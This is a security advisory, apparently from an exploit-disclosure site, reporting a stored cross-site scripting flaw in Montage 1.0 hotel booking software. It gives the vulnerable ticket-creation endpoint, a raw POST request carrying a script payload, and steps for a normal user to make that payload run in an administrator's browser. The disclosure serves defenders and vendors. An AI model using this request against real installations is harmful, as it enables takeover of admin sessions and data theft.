Montage 1.0 Cross Site Scripting

2023.07.18
Credit: CraCkEr
Risk: Low
Local: No
Remote: Yes
CVE: N/A
CWE: CWE-79

# Exploit Title: Montage 1.0 Hotel Booking & Property Selling - Stored XSS # Exploit Author: CraCkEr # Date: 13/07/2023 # Vendor: Bug Finder # Vendor Homepage: https://bugfinder.net/ # Software Link: https://bugfinder.net/product/montage-a-complete-solution-for-hotel-booking-property-selling/16 # Tested on: Windows 10 Pro # Impact: Manipulate the content of the site ## Description Allow Attacker to inject malicious code into website, give ability to steal sensitive information, manipulate data, and launch additional attacks. Path: /montage/user/ticket/create POST parameter 'message' is vulnerable to XSS ----------------------------------------------------------- POST /montage/user/ticket/create HTTP/2 Content-Disposition: form-data; name="subject" Anything ----------------------------------------------------------- Content-Disposition: form-data; name="message" <script>alert(1)</script> ----------------------------------------------------------- ## Steps to Reproduce: 1. Login as a (Normal User) 2. in User [Dashboard] Click on [Support Ticket] on this Path: https://website/montage/user/ticket 3. Click on [Create Ticket] on this Path: https://website/montage/user/ticket/create 4. Enter Any Subject 5. Inject your XSS Payload in [Message Box] 6. Click on [Submit] 8. When ADMIN visit [SUPPORT TICKETS] on this Path: https://website/montage/admin/tickets and Open the [New Pending Ticket] 9. XSS Will Fire and Executed on his Browser [-] Done


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top